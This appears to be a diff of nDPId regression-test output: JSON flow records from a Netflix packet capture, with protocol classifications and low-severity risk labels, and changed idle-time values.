-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
-00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 